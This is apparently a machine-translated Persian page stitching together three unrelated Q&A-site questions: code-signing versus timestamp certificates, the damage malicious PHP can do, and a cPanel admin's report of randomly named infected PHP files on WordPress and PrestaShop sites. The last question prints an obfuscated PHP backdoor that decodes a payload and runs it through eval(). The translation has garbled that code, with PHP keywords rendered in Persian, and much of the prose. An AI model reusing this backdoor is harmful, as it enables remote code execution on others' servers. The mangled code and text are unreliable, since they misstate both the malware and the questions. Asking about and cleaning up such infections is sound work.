x.509 – چرا لازم است تا هر دو از امضای کد و گواهینامه تایپ زمان؟

من در مورد گزینه ای برای ایجاد گواهینامه برای امضای کدهای و مهر تایپ زمان خواندم. چرا ما به هر دو آنها نیاز داریم؟
من متوجه شدم که به من کمک می کند که مجبور باشم اعتبار کد من را افزایش دهم، اما چرا تنها با استفاده از یکی از آنها با دوره اعتبار بزرگتر استفاده نمی شود؟

به عنوان مثال، اجازه دهید یک گواهی امضای کد با یک سال اعتبار و تایپ زمان گواهینامه 2 سال آیا بهتر است فقط یک گواهینامه امضای کد با دوره 2 ساله ایجاد شود؟

هنگام تبدیل گواهی امضای کد به یک CRL، آیا تمام نشانه های آن نامعتبر است؟ چطوری در مورد تایپ کردن گواهینامه تایپ شده در crl چیه؟

آیا یک سناریو وجود دارد که ما ترجیح می دهیم یک گواهینامه مهر تایمر بدون گواهینامه امضای کد داشته باشیم؟

ویروس – چه آسیب می تواند کد مخرب کد PHP باعث می شود؟

چه آسیبی می تواند سایت های ویروسی که حاوی کد های مخرب کد PHP هستند را ایجاد کند؟ یک نمونه از یک قطعه کد پی اچ پی که می تواند به کامپیوتر شما آسیب برساند یا اطلاعات را سرقت کند کدام است؟

من می دانم که اگر بیشتر از همه کد کلاینت نتواند به هیچ وجه آسیب برساند، اما در مورد کد سمت سرور، چه آسیب می تواند باعث شود؟

من همیشه کنجکاو بودم که چگونه وب سایت می تواند به کامپیوتر شما آسیب برساند …

cpanel – فایلهای php به صورت تصادفی با کد مخرب

من می بینم که فایل های پی اچ پی در دایرکتوری های چندگانه با نام های تصادفی که دارای کد زیر هستند را نشان می دهد: https://pastebin.com/Baus2eCV که به

 `` `غلبه می کند
 $ ajyhxyf) {
    تابع ddrpid ($ mxgxe، $ qlfhzo، $ adusfqt) {
        بازگشت $ mxgxe [6] ($ mxgxe [4] ($ qlfhzo. $ mxgxe [2]، ($ adusfqt / $ mxgxe [8] ($ qlfhzo)) + 1)، 0، $ adusfqt)؛
    }
    تابع myvswg ($ mxgxe، $ otdyni) {
        بازگشت @ $ mxgxe [9] ($ mxgxe [0]، $ otdyni)؛
    }
    تابع vdklyzv ($ mxgxe، $ otdyni) {
        $ vvtrzvc = $ mxgxe [3] ($ otdyni)٪ 3؛
        اگر (! $ vvtrzvc) {
            eval ($ otdyni [1] ($ otdyni [2]))؛
            خروج ()؛
        }
    }
    $ ajyhxyf = myvswg ($ mxgxe، $ ajyhxyf)؛
    vdklyzv ($ mxgxe، $ mxgxe [5] ($ mxgxe [1]، $ ajyhxyf ^ ddrpid ($ mxgxe، $ qlfhzo، $ mxgxe [8] ($ ajyhxyf))))؛
}؟>
`` `

آنها اغلب سایت های وردپرس و یک نصب Prestashop هستند. من iThemes Security، Wordfence و GOTMLS را نصب کرده ام اما فایل ها هنوز به نمایش در می آیند. آنها همچنین در نصب Prestashop نشان داده می شوند.

من خودم می توانم نرم افزارهای مخرب را به صورت دستی تمیز کنم. مسئله نصب cpanel سخت تر است و این که چگونه این اتفاق می افتد. من تمام سایت ها را دانلود کرده ام و سایت های WordPress و فایل های اصلی را جایگزین / ارتقا داده ام، تمام پلاگین ها را به روز رسانی کرده اند و مجوز های فایل به عنوان iThemes توصیه می شود. در اینجا یک پرونده ورود به دایرکتوری / سایت مورد نظر است، اما من نمی دانم که من دنبال چه چیزی هستم: https://pastebin.com/pzrMMivr

از قبل سپاسگزارم.